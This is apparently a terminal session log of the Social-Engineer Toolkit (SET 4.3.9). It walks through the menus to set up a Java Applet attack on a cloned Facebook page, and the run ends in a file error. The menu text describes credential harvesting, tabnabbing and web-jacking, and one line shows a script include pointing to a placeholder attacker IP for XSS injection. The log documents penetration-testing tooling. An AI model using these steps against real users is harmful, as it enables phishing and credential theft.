-] New set_config.py file generated on: 2013-04-28 17:48:42.293050
[-] Verifying configuration update...
[] Update verified, config timestamp is: 2013-04-28 17:48:42.293050
[] SET is using the new config, no need to restart
:::=== :::===== :::====
::: ::: :::====
===== ====== ===
=== === ===
====== ======== ===
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1
.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 4.3.9 [---]
[---] Codename: 'Turbulence' [---]
[---] Follow us on Twitter: @trustedsec [---]
[---] Follow me on Twitter: @dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]
Welcome to the Social-Engineer Toolkit (SET). The one
stop shop for all of your social-engineering needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.
Visit: https://www.trustedsec.com
Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set> 2
The Web Attack module is a unique way of utilizing multiple web-based attacks
in order to compromise the intended victim.
The Java Applet Attack method will spoof a Java Certificate and deliver a
metasploit based payload. Uses a customized java applet created by Thomas
Werth to deliver the payload.
The Metasploit Browser Exploit method will utilize select Metasploit
browser exploits through an iframe and deliver a Metasploit payload.
The Credential Harvester method will utilize web cloning of a web-
site that has a username and password field and harvest all the
information posted to the website.
The TabNabbing method will wait for a user to move to a different
tab, then refresh the page to something different.
The Man Left in the Middle Attack method was introduced by Kos and
utilizes HTTP REFERER's in order to intercept fields and harvest
data from them. You need to have an already vulnerable site and in-
corporate <script src="http://YOURIP/">. This could either be from a
compromised site or through XSS.
The Web-Jacking Attack method was introduced by white_sheep, Emgent
and the Back|Track team. This method utilizes iframe replacements to
make the highlighted URL link to appear legitimate however when clicked
a window pops up then is replaced with the malicious link. You can edit
the link replacement settings in the set_config if its too slow/fast.
The Multi-Attack method will add a combination of attacks through the web attack
menu. For example you can utilize the Java Applet, Metasploit Browser,
Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
all at once to see which is successful.
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Create or import a CodeSigning Certificate
99) Return to Main Menu
set:webattack>1
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu
set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: no
[-] Enter the IP address of your interface IP or if your using an external IP, what
[-] will be used for the connection back and to house the web server (your interface address) 192.168.103.76
- Java Required
- Gmail
- Google
- Facebook
- Twitter
set:webattack> Select a template:4
[] Cloning the website: http://www.facebook.com
[] This could take a little bit...
[] Injecting Java Applet attack into the newly cloned website.
[] Filename obfuscation complete. Payload name is: m0W6rw
[*] Malicious java applet website prepped for deployment
[!] Something went wrong, printing the error: [Errno 2] No such file or directory: 'src/html/Signed_Update.jar.orig' |